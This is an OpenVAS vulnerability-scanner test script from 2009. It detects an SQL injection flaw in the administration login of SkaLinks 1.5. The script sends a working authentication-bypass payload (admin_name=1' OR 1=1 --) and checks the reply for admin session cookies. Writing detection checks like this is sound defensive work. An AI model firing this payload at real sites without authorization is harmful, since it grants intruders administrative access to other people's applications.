###############################################################################
# OpenVAS Vulnerability Test
# $Id: SkaLinks_1_5_administration_login_sql_injection.nasl 131 2009-03-15 15:45:41Z mime $
#
# SkaLinks Administration Login SQL Injection Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100052);
 script_bugtraq_id(33546);
 script_version ("1.0");

 script_name(english:"SkaLinks Administration Login SQL Injection Vulnerability");
 desc["english"] = "

 Overview:
  SkaLinks is prone to an SQL-injection vulnerability because it fails
  to sufficiently sanitize user-supplied data before using it in an
  SQL query.

  Exploiting this issue could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database.

  SkaLinks 1.5 is vulnerable; other versions may also be affected. 

 See also:
  http://www.securityfocus.com/bid/33546

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if SkaLinks is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dirs = make_list("/dir","/skalinks",cgi_dirs());
foreach dir (dirs) {

    url = string(dir, "/admin/index.php");
    req = http_get(item:url, port:port);
    buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if( buf == NULL )continue;

    if( egrep(pattern: ".*Powered by <a [^>]+>SkaLinks.*", string: buf) ) {
	    variables = string("admin_name=1%27+OR+1%3D1+--+&admin_password=x&Login=Login");
	    filename = string(dir + "/admin/index.php");
	    host=get_host_name();

	    req = string(
	      "POST ", filename, " HTTP/1.0\r\n", 
	      "Referer: ","http://", host, filename, "\r\n",
	      "Host: ", host, ":", port, "\r\n", 
	      "Content-Type: application/x-www-form-urlencoded\r\n", 
	      "Content-Length: ", strlen(variables), 
	      "\r\n\r\n", 
	      variables
	    );

	    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
	    if( result == NULL )continue;

	    if(
	       egrep(pattern: "^Set-Cookie: adminname=.*", string: result) &&
	       egrep(pattern: "^Set-Cookie: pwd=", string: result) &&
	       egrep(pattern: "^Location: http://.*/admin/", string: result) )
	     {
	         security_warning(port);
	         exit(0);
	     }
    }
}

exit(0);
